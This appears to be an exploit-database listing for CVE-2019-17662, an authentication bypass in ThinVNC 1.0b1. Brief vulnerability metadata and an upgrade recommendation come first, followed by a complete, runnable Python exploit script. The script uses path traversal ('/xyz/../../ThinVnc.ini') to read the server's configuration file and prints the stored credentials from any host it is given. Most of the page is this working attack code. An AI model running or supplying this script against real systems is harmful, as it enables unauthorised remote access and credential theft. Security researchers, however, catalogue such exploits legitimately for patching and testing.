header-logo
Suggest Exploit
vendor:
ThinVNC
by:
Nikhith Tumamlapalli, WarMarX
9.8
CVSS
CRITICAL
Authentication Bypass
287
CWE
Product Name: ThinVNC
Affected Version From: 1.0b1
Affected Version To: 1.0b1
Patch Exists: YES
Related CWE: CVE-2019-17662
CPE: a:thinvnc:thinvnc:1.0b1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows All Platforms
2019

ThinVNC 1.0b1 – Authentication Bypass

Authentication Bypass via Arbitrary File Read. An attacker can exploit this vulnerability by sending a crafted request to the vulnerable server. This will allow the attacker to read arbitrary files from the server.

Mitigation:

Upgrade to the latest version of ThinVNC.
Source

Exploit-DB raw data:

# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
# Date: 2019-10-17
# Exploit Author: Nikhith Tumamlapalli
# Contributor WarMarX
# Vendor Homepage: https://sourceforge.net/projects/thinvnc/
# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
# Version: 1.0b1
# Tested on: Windows All Platforms
# CVE : CVE-2019-17662

# Description:
# Authentication Bypass via Arbitrary File Read

#!/usr/bin/python3

import sys
import os
import requests

def exploit(host,port):
    url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
    r = requests.get(url)
    body = r.text
    print(body.splitlines()[2])
    print(body.splitlines()[3])



def main():
    if(len(sys.argv)!=3):
        print("Usage:\n{} <host> <port>\n".format(sys.argv[0]))
        print("Example:\n{} 192.168.0.10 5888")
    else:
        port = sys.argv[2]
        host = sys.argv[1]
        exploit(host,port)

if __name__ == '__main__':
    main()